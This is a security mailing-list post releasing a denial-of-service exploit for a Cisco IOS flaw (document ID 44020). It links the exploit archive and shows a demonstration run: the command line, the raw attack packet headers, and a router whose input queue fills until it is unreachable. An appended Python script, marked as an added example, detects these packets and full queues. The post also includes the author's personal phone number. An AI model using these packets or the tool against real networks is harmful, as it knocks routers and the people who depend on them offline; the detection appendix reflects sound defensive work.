Cisco IOS exploit (44020): msg#00301 security.bugtraq
Hi,

I'd like to submit a DoS attack against the recently found bug in almost all Cisco IOS versions (Cisco document ID 44020).

The exploit can be found here (and it is included as attachment):
http://www.elxsi.de/cisco-bug-44020.tar.gz

This exploit is NOT broken (like the shadowchode.tar.gz exploit for example):

Example:

bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
Connected to 192.168.1.123.
Escape character is '^]'.

User Access Verification

Username: 103
Password: ******
1003>show version
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
Image text-base: 0x02004000, data-base: 0x0259733C

ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE (fc1)
BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9), RELEASE SOFTWARE (fc1)

1003 uptime is 6 minutes
System restarted by power-on
System image file is "flash:c1000-bnsy56-mz.120-22.bin"

cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of memory.
Processor board ID 03305903
Bridging software.
X.25 software, Version 3.0.0.
Basic Rate ISDN software, Version 1.1.
1 Ethernet/IEEE 802.3 interface(s)
1 ISDN Basic Rate interface(s)
7K bytes of non-volatile configuration memory.

bash-2.05b#./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0
DEBUG: Hops: 1
DEBUG: Protocol: 53
DEBUG: Checksum: 47299
DEBUG: 45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 61909
DEBUG: 45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 55515
DEBUG: 45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 53
DEBUG: Checksum: 10618
DEBUG: 45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 77
DEBUG: Checksum: 40137
DEBUG: 45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.

<snip> ... <snip>

bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
telnet: Unable to connect to remote host: No route to host

If I login via term, I can see the following:

Press RETURN to get started!

00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up
00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0, changed stp
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1, changed staten
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2, changed staten
00:00:39: %SYS-5-CONFIG_I: Configured from memory by console
00:00:39: %SYS-5-RESTART: System restarted --
Cisco Internetwork Operating System Software
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up

1003>en
Password: ******
1003#show Interfaces Ethernet 0
Ethernet0 is up, line protocol is up
  Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia 0060.7062.5727)
  Internet address is 192.168.1.123/24
  MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
  Encapsulation ARPA, loopback not set, keepalive set (10 sec)
  ARP type: ARPA, ARP Timeout 04:00:00
  Last input 00:02:04, output 00:00:04, output hang never
  Last clearing of "show interface" counters never
  Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
               ^^
               ||
               The input queue is full :)

Cheers,
Martin Kluge

--
Name     : Martin Kluge
email    : martin@xxxxxxxxxx
Phone    : +49 160 1515182
Projects : http://www.aa-security.de
GPG Key  : http://www.elxsi.de/key.pub
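A detection-side check built from the output in the message above, as an added example that is not part of the original post: it parses an IPv4 header given as a hex dump, flags packets that carry an expiring TTL together with one of the protocol numbers shown in the DEBUG lines, and reads the `Input queue:` counters from `show interfaces` output. The function names and the protocol set are assumptions drawn from the post's output only, and the benign header is constructed.

```python
import re
import struct

# Assumption: protocol numbers taken from the DEBUG lines in the post above.
SUSPECT_PROTOCOLS = {53, 55, 77}

def checksum_ok(header: bytes) -> bool:
    """RFC 791: the folded one's-complement sum of all header words is 0xFFFF."""
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total == 0xFFFF

def parse_ipv4_header(hex_dump: str) -> dict:
    """Parse a space-separated hex dump of an IPv4 header."""
    raw = bytes.fromhex(hex_dump)
    if len(raw) < 20 or raw[0] >> 4 != 4:
        raise ValueError("not an IPv4 header")
    ihl = (raw[0] & 0x0F) * 4
    if ihl < 20 or len(raw) < ihl:
        raise ValueError("truncated header or invalid IHL")
    (total_len,) = struct.unpack("!H", raw[2:4])
    return {
        "ihl": ihl, "total_len": total_len, "ttl": raw[8], "proto": raw[9],
        "src": ".".join(map(str, raw[12:16])),
        "dst": ".".join(map(str, raw[16:20])),
        "checksum_ok": checksum_ok(raw[:ihl]),
    }

def is_suspect(pkt: dict) -> bool:
    """Flag the pattern visible in the post: TTL of 1 or 0 and a listed protocol."""
    return pkt["ttl"] <= 1 and pkt["proto"] in SUSPECT_PROTOCOLS

def input_queue_full(show_interface_output: str) -> bool:
    """True when the 'Input queue: size/max/...' counters show size >= max."""
    m = re.search(r"Input queue:\s*(\d+)/(\d+)/", show_interface_output)
    if not m:
        raise ValueError("no Input queue line found")
    size, maximum = int(m.group(1)), int(m.group(2))
    return maximum > 0 and size >= maximum

# First header and queue line are copied from the post; the benign header is constructed.
POST_HEADER = "45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b"
BENIGN_HEADER = "45 00 00 54 00 00 40 00 40 01 00 00 c0 a8 01 01 c0 a8 01 7b"  # checksum left unset
QUEUE_LINE = "Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0"

if __name__ == "__main__":
    print(is_suspect(parse_ipv4_header(POST_HEADER)), input_queue_full(QUEUE_LINE))
```
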